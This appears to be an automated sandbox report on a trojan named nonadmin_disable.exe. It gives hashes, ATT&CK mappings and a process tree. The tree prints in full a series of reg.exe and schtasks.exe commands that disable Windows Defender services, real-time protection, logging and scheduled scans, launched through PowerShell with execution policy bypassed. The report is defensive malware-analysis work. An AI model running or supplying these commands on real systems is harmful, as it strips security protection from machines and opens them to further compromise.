5e7c51cdbaaea395aec1e337592e4e210a698c47fe51d4e5f7b96166cacfd9bf

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06/01/2023, 17:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nonadmin_disable.exe
Size

119KB
MD5

dc83dd2798a8ed47fde094ec809ea42b
SHA1

0f40cbafb0be6e18a1e83138625a555261e34583
SHA256

5e7c51cdbaaea395aec1e337592e4e210a698c47fe51d4e5f7b96166cacfd9bf
SHA512

d96133753e4a3ca779b3910069486b24088113546901fd8178e05b3289325fd9e04665f75137bcb35a23ca85687506ad25e1f3d54a96ccbd0fe06f7340c93ed1
SSDEEP

3072:Jpvb7RV/8hhb3dLUK94IgqHniOSyaZoc7QNPnP9TBfWSiwp:z9VkhhrdYK94IgqHniOSyaZoc7QNPnPP

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "0"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	nonadmin_disable.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry key 1 TTPs 11 IoCs

Modify Registry

T1112

pid	Process
204	reg.exe
1772	reg.exe
1804	reg.exe
4364	reg.exe
3420	reg.exe
4028	reg.exe
620	reg.exe
4888	reg.exe
2640	reg.exe
2424	reg.exe
3700	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1600	powershell.exe
1600	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1600	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 1600	4320	nonadmin_disable.exe	81
PID 4320 wrote to memory of 1600	4320	nonadmin_disable.exe	81
PID 1600 wrote to memory of 4300	1600	powershell.exe	83
PID 1600 wrote to memory of 4300	1600	powershell.exe	83
PID 1600 wrote to memory of 2320	1600	powershell.exe	84
PID 1600 wrote to memory of 2320	1600	powershell.exe	84
PID 1600 wrote to memory of 4576	1600	powershell.exe	85
PID 1600 wrote to memory of 4576	1600	powershell.exe	85
PID 1600 wrote to memory of 4100	1600	powershell.exe	86
PID 1600 wrote to memory of 4100	1600	powershell.exe	86
PID 1600 wrote to memory of 3892	1600	powershell.exe	87
PID 1600 wrote to memory of 3892	1600	powershell.exe	87
PID 1600 wrote to memory of 4380	1600	powershell.exe	88
PID 1600 wrote to memory of 4380	1600	powershell.exe	88
PID 1600 wrote to memory of 2156	1600	powershell.exe	89
PID 1600 wrote to memory of 2156	1600	powershell.exe	89
PID 1600 wrote to memory of 1400	1600	powershell.exe	90
PID 1600 wrote to memory of 1400	1600	powershell.exe	90
PID 1600 wrote to memory of 3476	1600	powershell.exe	91
PID 1600 wrote to memory of 3476	1600	powershell.exe	91
PID 1600 wrote to memory of 1940	1600	powershell.exe	92
PID 1600 wrote to memory of 1940	1600	powershell.exe	92
PID 1600 wrote to memory of 2296	1600	powershell.exe	93
PID 1600 wrote to memory of 2296	1600	powershell.exe	93
PID 1600 wrote to memory of 2668	1600	powershell.exe	94
PID 1600 wrote to memory of 2668	1600	powershell.exe	94
PID 1600 wrote to memory of 4284	1600	powershell.exe	95
PID 1600 wrote to memory of 4284	1600	powershell.exe	95
PID 1600 wrote to memory of 204	1600	powershell.exe	96
PID 1600 wrote to memory of 204	1600	powershell.exe	96
PID 1600 wrote to memory of 4888	1600	powershell.exe	97
PID 1600 wrote to memory of 4888	1600	powershell.exe	97
PID 1600 wrote to memory of 2384	1600	powershell.exe	98
PID 1600 wrote to memory of 2384	1600	powershell.exe	98
PID 1600 wrote to memory of 2588	1600	powershell.exe	99
PID 1600 wrote to memory of 2588	1600	powershell.exe	99
PID 1600 wrote to memory of 4588	1600	powershell.exe	100
PID 1600 wrote to memory of 4588	1600	powershell.exe	100
PID 1600 wrote to memory of 4956	1600	powershell.exe	101
PID 1600 wrote to memory of 4956	1600	powershell.exe	101
PID 1600 wrote to memory of 4824	1600	powershell.exe	102
PID 1600 wrote to memory of 4824	1600	powershell.exe	102
PID 1600 wrote to memory of 2640	1600	powershell.exe	103
PID 1600 wrote to memory of 2640	1600	powershell.exe	103
PID 1600 wrote to memory of 2424	1600	powershell.exe	104
PID 1600 wrote to memory of 2424	1600	powershell.exe	104
PID 1600 wrote to memory of 3700	1600	powershell.exe	105
PID 1600 wrote to memory of 3700	1600	powershell.exe	105
PID 1600 wrote to memory of 4436	1600	powershell.exe	106
PID 1600 wrote to memory of 4436	1600	powershell.exe	106
PID 1600 wrote to memory of 768	1600	powershell.exe	107
PID 1600 wrote to memory of 768	1600	powershell.exe	107
PID 1600 wrote to memory of 4292	1600	powershell.exe	108
PID 1600 wrote to memory of 4292	1600	powershell.exe	108
PID 1600 wrote to memory of 3420	1600	powershell.exe	109
PID 1600 wrote to memory of 3420	1600	powershell.exe	109
PID 1600 wrote to memory of 1772	1600	powershell.exe	110
PID 1600 wrote to memory of 1772	1600	powershell.exe	110
PID 1600 wrote to memory of 1804	1600	powershell.exe	111
PID 1600 wrote to memory of 1804	1600	powershell.exe	111
PID 1600 wrote to memory of 4028	1600	powershell.exe	112
PID 1600 wrote to memory of 4028	1600	powershell.exe	112
PID 1600 wrote to memory of 620	1600	powershell.exe	113
PID 1600 wrote to memory of 620	1600	powershell.exe	113

C:\Users\Admin\AppData\Local\Temp\nonadmin_disable.exe
"C:\Users\Admin\AppData\Local\Temp\nonadmin_disable.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\8A05.tmp\8A06.tmp\8A07.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1600
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:4300
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2320
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:4576
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:4100
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3892
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4380
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2156
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1400
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3476
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:2296
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:2668
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:4284
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:204
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:4888
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:2384
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:2588
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:4588
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:4956
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4824
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Windows Defender" /f
    3⤵
    - Modifies registry key
    PID:2640
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
    3⤵
    - Modifies registry key
    PID:2424
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
    3⤵
    - Modifies registry key
    PID:3700
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
    3⤵
    PID:4436
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
    3⤵
    PID:768
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
    3⤵
    PID:4292
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:3420
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:1772
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:1804
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:4028
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:620
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:4364

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8A05.tmp\8A06.tmp\8A07.ps1

Filesize
6KB

MD5
46b988146ecd9692a2e470fbfc3a7981

SHA1
87c28487611b904beabeae5e19cd43dc7f34acee

SHA256
dcc7120b73141d32d333c91d33a89f78da0ad3d956ba9118b15e553aee66e389

SHA512
1399fa1d43902b57d14709d84c5a22bdda942bb226a7e0a709b1f78a635062b909e67843313f80e701808daf7820c1cf8dcc4d65b13bccd863876c6195626393

Download Submit
memory/1600-137-0x00007FFF25880000-0x00007FFF26341000-memory.dmp

Filesize
10.8MB

Download
memory/1600-168-0x00007FFF25880000-0x00007FFF26341000-memory.dmp

Filesize
10.8MB

Download
memory/1600-133-0x000001C97C640000-0x000001C97C662000-memory.dmp

Filesize
136KB

Download